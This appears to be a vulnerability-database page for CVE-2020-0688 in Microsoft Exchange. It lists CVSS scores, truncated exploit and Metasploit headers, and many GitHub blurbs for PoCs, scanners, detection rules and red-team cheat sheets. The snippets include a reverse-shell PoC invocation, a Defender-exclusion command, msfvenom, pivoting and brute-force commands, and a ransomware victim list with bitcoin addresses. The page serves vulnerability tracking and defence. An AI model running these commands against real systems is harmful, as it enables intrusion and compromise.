8.8
CVSSv3

CVE-2020-0688

Published: 11/02/2020 Updated: 12/07/2022
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 945
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.

Most Upvoted Vulmon Research Post

There is no Researcher post for this vulnerability
Would you like to share something about it? Sign up now to share your knowledge with the community.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft exchange server 2013

microsoft exchange server 2016

microsoft exchange server 2019

microsoft exchange server 2010

Exploits

# Exploit Title: Microsoft Exchange 2019 15222112 - Authenticated Remote Code Execution # Date: 2020-02-28 # Exploit Author: Photubias # Vendor Advisory: [1] portalmsrcmicrosoftcom/en-US/security-guidance/advisory/CVE-2020-0688 # [2] wwwthezdicom/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsof ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'bindata' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager D ...

Mailing Lists

Microsoft Exchange 2019 version 15222112 suffers from an authenticated remote code execution vulnerability ...
This Metasploit module exploits a NET serialization vulnerability in the Exchange Control Panel (ECP) web page The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values With knowledge of these, values an attacker can craft a s ...
This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfodll with a malicious DLL containing the attacker's payload To achieve code execution as the SYSTEM user, the Update Session Orchestrat ...

Github Repositories

Powershell script helping for domain enumeration - Written while doing the 'Advanced Red Team' lab from pentesteracademy

Invoke-Recon Powershell script as a first step for domain enumeration Tries to spot quickwins Just because i'm tired to type the same AD / PowerView commands over and over Prerequisites You may want to exclude your tools directory from Defender (if you clone submodules for examples): Add-MpPreference -ExclusionPath "C:\Users\bleponge\Documents\myrepos" Get-MpP

I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, reducing hugely steps for that

cve-2020-0688 I made this script for conducting CVE-2020-0688 more rapidly It helps to improve checking the vuln, reducing hugely steps for that Modify these inputs before running the file url = "mailsomethingcom" #input 1* command = "cmd /c echo OOOPS!!! > c:/truongtntxt" #input2* aspsession = "1111a11c-11ad-1c11-1111-1111122f5977&

This AD attacks CheatSheet, made by RistBS is inspired by the Active-Directory-Exploitation-Cheat-Sheet repo it is the first version of this repo, many things will be added later, so stay tuned ! :D Active-directory-Cheat-sheet Summary AD Exploitation Cheat Sheet by RistBS Summary Tools Powershell Components Powershell Tricks PSWA Abusing Enumeration GPO enumeration ACL

Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file \CVE-2020-0688ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by seting header in response powershell -exec bypass

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM About Vulnerability The bug is found in the Exchange

winddows-Active-Directory-Cheatsheet A cheatsheet in order to help during intrusion steps on Windows environment Summary Tools Enumeration Pre auth Find valid users Find valid credentials AS REP Roast Responder Post auth Domain info Powerview Bloodhound Ldeep SPNs Privelege Escalation PowerUp WinPeas FullPower PrintSpoofer Potatoes DNS Admin Abuse Backup Operato

CCF - Cyber Crime and Forensics course: Incident response on cyber incidents: Acquisition and netwok analysis: Wireshark, Brim File system and OS artifacts analysis: AccessData FTK, Autopsy, Event Log Explorer Memory analysis: Capa, volatility Sandboxing and static analysis of malware: Anyrun, hybrid analysis, cuckoo sandbox, ghidra, IDA, Windbg Nobelium APT SolarWinds Inci

A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.

Description A tool for generating NET serialized gadgets that can trigger NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts The current gadget triggers a call to ActivatorCreateInstance() when deserialized using BinaryFormatter from jscript/vbscript/vba, this means it can be used to trigger execution of your NET assembly of choice

PoC RCE Reverse Shell for CVE-2020-0688

CVE-2020-0688 Working Exploit PoC (CVE-2020-0688) - Reverse Bind Shell Tested using Python27 To Install: pip install -r requirementstxt To Run: python CVE-2020-0688-POCpy 1016124 -lhost 10111 -lport 4444

PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell

PSForgot2kEyXCHANGE PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell Usage This PoC requires a valid Username and Password This PoC uses ysoserialnet to create the new ViewState which contains the command you specified on the -Command param If you don't already have this installed on your system download it here PS> \PSForgot2kEyXCHANGEps1 PS&

CVE-2020-0688 CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability

Proxylogon-106370718 Proxylogon 事件: 微軟(Microsoft)上周公布了修補遭到駭客攻擊的 Exchange Server 漏洞,全球恐有數萬個組織受到影響。網域與被入侵的Exchange郵件伺服器有關,而這臺伺服器後來被駭客當作C&C中繼站使用,導致接下來發生加密攻擊事故。   嚴重性: 全球企業普遍使用微

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

justtest

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM About Vulnerability The bug is found in the Exchange

Scans for Microsoft Exchange Versions with masscan

CVE-2020-0688-Scanner This script scans an IP/range/CIDR and outputs the Microsoft Exchange Servers and Versions discovered The specified IP/range/CIDR will be scanned with masscan on port tcp/443 After a successful scan it tries to HTTP GET "/owa/auth/logonaspx" with curl to grab the Outlook Web Access page source for build versions to display On Small Business S

CVE-2020-0688 - Exchange

python3 CVE-2020-0688py mailchinabaikercom username@domaincom password command

A command line tool to search AttackerKB.

AKB-Explorer A command line tool to search AttackerKB How to install Not much to do, you just have to clone the repo and install the required python libraries git clone githubcom/horshark/akb-explorer/ pip install -r requirementstxt Then you need to add your AKB API key in config/apitxt You can retrive it from your AKB profile echo "YOUR_AKB_API_KEY_HERE&quo

Homework-of-C-Sharp C Sharp codes of my blog Shellcodecs Use CreateThread to run shellcode ShellcodeBase64txt Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calcexe EXITFUNC=thread -f csharp) ReadShellcodecs It will read ShellcodeBase64txt and launch the shellcode DumpLsasscs Source code is githubcom/GhostPack/SafetyKatz Remove some functions of th

CVE-2020-0688 PoC

ecp_slap This proof-of-concept for CVE-2020-0688 includes functions for the scanning and exploitation of a vulnerable on-prem Exchange instance Usage scan - provide credentials and target information to obtain cookies required for exploitation and saves them to 'cookiestxt' Also checks for exposure of the Exchange Control Panel (ECP) service for the targeted Excha

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file \CVE-2020-0688ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by seting header in response powershell -exec bypass

CVE-2020-0688_EXP Auto trigger payload & encrypt method

CVE-2020-0688_EXP CVE-2020-0688_EXP Auto trigger payload python3 CVE-2020-0688_EXPpy -h usage: CVE-2020-0688_EXPpy [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PA

Support: This AD attacks CheatSheet, made by RistBS is inspired by the Active-Directory-Exploitation-Cheat-Sheet repo it is the first version of this repo, many things will be added later, so stay tuned ! :D Information : some courses will be in French because I don't have time to translate everything but don't worry it will be translated in some time Red Team Bib

A curated list of awesome C-Sharp frameworks, libraries and software.

awesome-c-sharp A curated list of awesome C-Sharp frameworks, libraries and software CodeHubApp/CodeHub - CodeHub is an iOS application written using Xamarin mxgmn/WaveFunctionCollapse - Bitmap & tilemap generation from a single example with the help of ideas from quantum mechanics dotnet-architecture/eShopOnContainers - Cross-platform NET sample microservices and c

weaponized tool for CVE-2020-0688

weaponized tool for CVE-2020-0688(Microsoft Exchange 2010 MRMAutoTagModel unsafe deserialize vulnerability) build install net framework 35 first, then make usage CVE-2020-17144 <target> <user> <pass> After exploit, access [target]/ews/soap/?pass=whoami to get command execution And you can also modify ecs as a customize e

Exchange学习 整理和自己写了一些exchange的脚本 CheckInfo 基于exchange版本和补丁日期检测漏洞 版本识别 通过 owa 接口,获取短版本信息 通过 /ecp/Current/exporttool/microsoftexchangeediscoveryexporttoolapplication 接口获取完整版本信息 通过 /owa/service, /owa 接口响应头 X-OWA-Version获取完整版本 爆破 /ec

2018年初整理的一些内网渗透TIPS,后面更新的慢,所以公开出来希望跟小伙伴们一起更新维护~

Author: Evi1cg Blog: evi1cggithubio Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业弱账

做redteam时使用,修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration Tips Modified by: z3r0yu Blog: zeroyuxyz PS: 主要增加的内容是自己在做redteam时候的一些技巧 Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对

General Security Scripts

GeneralSecurityScripts --> Please note, unless mentioned otherwise, all scripts work on both Linux and Windows, and for Python2 or 3 (look at the first line) GetNessusHomeCodepy: Automated registration for new Nessus Home Feed license DownloadNessuspy: Automated script for downloading the most recent Nessus version (Linux version only) rdpstrippy: Automated MitM scri

做redteam时使用,修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration CheetSheets Modified by: z3r0yu Blog: zeroyuxyz Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Es

Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalation Useful Local Priv Esc Tools Lateral Movement Powershell Remoting Remote Code Execution with PS Credentials Import a powershell module and execute its functions remotely Executing Remote St

adPEAS adPEAS is a Powershell tool to automate Active Directory enumeration In fact, adPEAS is like a wrapper for different other cool projects like PowerView Empire Bloodhound and some own written lines of code As said, adPEAS is a wrapper for other tools They are almost all written in pure Powershell but some of them are included as compressed binary blob or C# code adPE

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Es

Scripts to scan for Microsoft Exchange Vulnerabilities In 2021 several dangerous and widely exploited vulnerabilities for Microsoft Exchange servers have been published This repository provides scripts to scan for CVE-2021-26855: The SSRF vulnerability which is the entry point for the ProxyLogon exploit chain CVE-2021-34473: The pre-auth path confusion which is the entry poi

Unclaimed victims: 1-gridcom Andersonautomotivecom Xerox Ticket Master Group Angelino Rockford School District HUDSON PROPERTIES GRANT & WEBER Koons Automotive SDIGC HOULE ELEC GROUPDOMAIN Perennials Fabrics Skecoplantcom Guardiaciviles Birkenstockcom BTC/BECH32 addresses: 1HtyXyCrshiJmLYNru7atpDMJrzG9mzwzf 1FWWRT88WjYbZp4NoRNEBgTGjRxhi2J9YM 15gjb8F5Zd8XR

Powershell tool to automate Active Directory enumeration.

adPEAS adPEAS is a Powershell tool to automate Active Directory enumeration In fact, adPEAS is like a wrapper for different other cool projects like PowerView Empire Bloodhound and some own written lines of code As said, adPEAS is a wrapper for other tools They are almost all written in pure Powershell but some of them are included as compressed binary blob or C# code How

adPEAS adPEAS is a Powershell tool to automate Active Directory enumeration In fact, adPEAS is like a wrapper for different other cool projects like PowerView Empire Bloodhound and some own written lines of code As said, adPEAS is a wrapper for other tools They are almost all written in pure Powershell but some of them are included as compressed binary blob or C# code adPE

Generic assessment template

Pentest Template 1) Setup attacking machine: # NOTE: icmp and udp can't be proxied via proxychains! # setting up, socks, port forwarding for payload delivery ssh -f -N -D <LOCALIP>:<LOCALPORT> root@<REMOTEIP> # from local box socat TCP-LISTEN:<LOCALPORT>,bind=<LOCALIP>,fork,reuseaddr TCP:<RE

CS2020 repository MSEL concepts: DMZ # initial access firewall cve (out of scope?) python3 pfsense_auth_226_execpy localhost:65535 nc <IP> # initial access firewall (lockout feature!) web-proxy, ftp, dns, and web-conf proxychains hydra -L ~/userstxt -P ~/passwordstxt <IP> ssh -u -V; # shell to dmz boxes via ssh ssh <USER>@&

2020年网上阅读过的文章记录

渗透 Seagate Central Storage远程执行代码0天 NSA固件漏洞挖掘 SKF实验室 GraphQL错误,JWT,SSRF,SSTI漏洞环境,可以和githubcom/D0g3-Lab/H1ve漏洞环境结合一起使用 hydra使用 新用法、结合tor代理破解密码 通过滥用文件下载功能中的SQL注入来窃取NTLMv2哈希 通过注入获取NTLMv2 hash值 持久性&nd

This is an open source Snort rules repository

SnortRules This is an open source Snort rules repository for exploit and application detection signatures Exploit Rules: CVE-2020-0618 CVE-2020-0688 CVE-2020-1938 CVE-2020-10189 CVE-2020-3952 CVE-2020-5902 CVE-2020-1350 CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)

Deserialization payload generator for a variety of .NET formatters

A proof-of-concept tool for generating payloads that exploit unsafe NET object deserialization Description ysoserialnet is a collection of utilities and property-oriented programming "gadget chains" discovered in common NET libraries that can, under the right conditions, exploit NET applications performing unsafe deserialization of objects The main driver progra

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready to use code for red teaming *References: githubcom/GhostPack githubcom/rootm0s/WinPwnage githubcom/0xbadjuju/WheresMyImplant githubcom/hfiref0x/UACME githubcom/RhinoSecurityLabs/Aggressor-Scripts pentestmagcom/simpleshellcodeinjector-ssi/ Exploits krbtgtpw/dacl-permis

AD_Pentest 红队|域渗透重要漏洞汇总(持续更新) 欢迎加入免费知识星球《网安成长营》一起交流讨论技术: tzsxqcom/08Ac3CEkC [TOC] 可直接拿域控 MS14-068 kerberos认证,no PAC 用户在向 Kerberos 密钥分发中心(KDC)申请TGT(由票据授权服务产生的身份凭证)时,可以伪造自己的 Kerberos 票据

Active Directory Exploitation Cheat Sheet This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Useful

AD_Pentest 红队|域渗透重要漏洞汇总(持续更新) 欢迎加入免费知识星球《网安成长营》一起交流讨论技术: tzsxqcom/08Ac3CEkC 目录: 可直接拿域控 MS14-068 CVE-2020-1472 CVE-2021-42287&42278 CVE-2021-1675/CVE-2021-34527 CVE-2019-1040 域委派攻击 NTLM Relay ADCS漏洞--ESC8(PetitPotam)(ADCS relay) ADCS漏洞--CVE

Active Directory Exploitation Cheat Sheet This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Useful

Active Directory Exploitation Cheat Sheet This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Using

Detections by Author Author Count DNIF 138 community 127 Total 265 Detections by Directory Directory Count /Advanced Threat Detection/Windows Process Monitoring 119 /Advanced Threat Detection/Proxy Monitoring 29 /Advanced Threat Detection/Webserver Exploits 9 /Cloud Security/Amazon Web Services 13 /Advanced Threat Detection/DNS Monitoring 4 /Cloud

Active-Directory-Exploitation-Cheat-Sheets This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Useful

Active Directory Exploitation Cheat Sheet This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Useful

Active Directory Exploitation Cheat Sheet This cheat sheet contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheat Sheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Remote BloodHound On Site BloodHound Useful

CVEs enumerated by FireEye and that should be addressed to limit the effectiveness of leaked the Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN

vFeed CVEs Vulnerability Indicators that should be addressed to limit the effectiveness of the Leaked FireEye Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Forti

cisa_AA22-011A Test Cases - Understanding and Mitigating Russian State-Sponsored Cyber Threats to US Critical Infrastructure Vulnerabilities known to be exploited by Russian state-sponsored APT actors for initial access include: CVE-2018-13379 FortiGate VPNs CVE-2019-1653 Cisco router CVE-2019-2725 Oracle WebLogic Server CVE-2019-7609 Kibana CVE-2019-9670 Zimbra software CVE

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

AD-Pentesting-Tools Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vul

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentesters-toolbox General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scan

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools Windows Active Directory Pentest General usefull Powershell Scripts githubcom/S3cur3Th1sSh1t/WinPwn - githubcom/dafthack/MailSniper githubcom/putterpanda/mimikittenz githubcom/dafthack/DomainPasswordSpray githubcom/mdavis332/DomainPasswordSpray - same but kerberos auth for more stealth and lockout-sleep github

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Windows Active Directory penetration testing Technical notes and list of tools, scripts and Windows commands that I find useful during internal penetration tests (Windows environment/Active Directory) The output files included here are the results of tools, scripts and Windows commands that I ran against a vulnerable Windows AD lab that I created to test attacks/exploits and d

Ladon 911 20211108 Program introduction Ladon is a multi-threaded plug-in comprehensive scanni

Useful Pentest tool links

Pentest-Tools Red-Team-Essentialss General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vu

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Conti-Clear Extracted data & informations from the Conti & TrickBot leaks The beginning Well, Since Tob Trick started leaking Conti chats and conversations, most of people started translating them using translators like Deepl or Google Translate You can find the original + transalted chats of the Conti TrickBot Leaks here : conti-leaks-englished After tha

红队作战中比较常遇到的一些重点系统漏洞整理。

红队中易被攻击的一些重点系统漏洞整理 一、OA系统 泛微(Weaver-Ecology-OA) 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本70/80/81/90 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) 泛微ecology OA数据库配置信息泄露 泛微OA云桥任意文件读取 - 影响2018-2019 多个版本 泛微 e-cology OA 前台SQL注入漏

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Middleware-Vulnerability-detection 实时更新较好用最新漏洞EXP,仅供已授权渗透测试使用 2020418项目迎来两位伙伴一起维护 @caizhuang @3ndz Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache-Solr via Velocity template RCE --20203 CVE-2019-17564 Apache-Dubbo反序列化漏洞 --

CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15

Middleware-Vulnerability-detection 实时更新较好用最新漏洞EXP,仅供已授权渗透测试使用 2020418项目迎来两位伙伴一起维护 @caizhuang @3ndz Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache-Solr via Velocity template RCE --20203 CVE-2019-17564 Apache-Dubbo反序列化漏洞 --2

Master-Cheat-Sheet General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scan

红方人员作战执行手册

红方人员实战手册 声明 Author : By klion Date : 2020215 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备

红方人员实战手册 声明 Author : By klion Date : 2020215 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

